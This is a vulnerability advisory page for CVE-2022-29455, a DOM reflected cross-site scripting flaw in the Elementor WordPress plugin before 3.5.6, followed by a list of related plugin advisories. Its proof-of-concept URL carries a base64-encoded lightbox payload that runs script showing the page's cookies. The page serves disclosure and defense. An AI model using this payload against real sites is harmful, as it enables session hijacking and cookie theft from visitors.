Elementor < 3.5.6 – DOM Reflected Cross-Site Scripting | CVE 2022-29455 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape user input appended to the DOM via malicious Lightbox settings, resulting in a DOM Cross-Site Scripting issue

Proof of Concept

https://example.com/#elementor-action:action=lightbox&settings=ewogICAgInR5cGUiOiAidmlkZW8iLAogICAgInVybCI6ICJodHRwOi8vIiwKICAgICJ2aWRlb1R5cGUiOiAiaG9zdGVkIiwKICAgICJ2aWRlb1BhcmFtcyI6IHsKICAgICAgICAib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbisnICcrZG9jdW1lbnQuY29va2llKSIsCiAgICAgICAgInN0eWxlIjogImJhY2tncm91bmQtY29sb3I6cmVkIgogICAgfQp9

Affects Plugins

Fixed in 3.5.6

References

CVE

URL

https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Rotem Bar

Verified

Yes

WPVDB ID

9758570b-4729-4eef-ad52-b6e922f536d6

Timeline

Publicly Published

2022-06-13 (about 1 years ago)

Added

2022-06-13 (about 1 years ago)

Last Updated

2023-03-15 (about 1 years ago)

Other

Published

Title

Published

2018-08-19

Title

Supreme Directory Theme <= 1.1.8 - Unauthenticated Cross-Site Scripting (XSS)

Published

2022-08-30

Title

WP < 6.0.2 - Authenticated Stored Cross-Site Scripting

Published

2022-11-10

Title

Uji Countdown < 2.3.1 - Admin+ Stored XSS

Published

2023-02-20

Title

ProfilePress < 4.5.5 - Contributor+ Stored XSS

Published

2022-04-26

Title

Domain Replace <= 1.3.8 - Reflected Cross-Site Scripting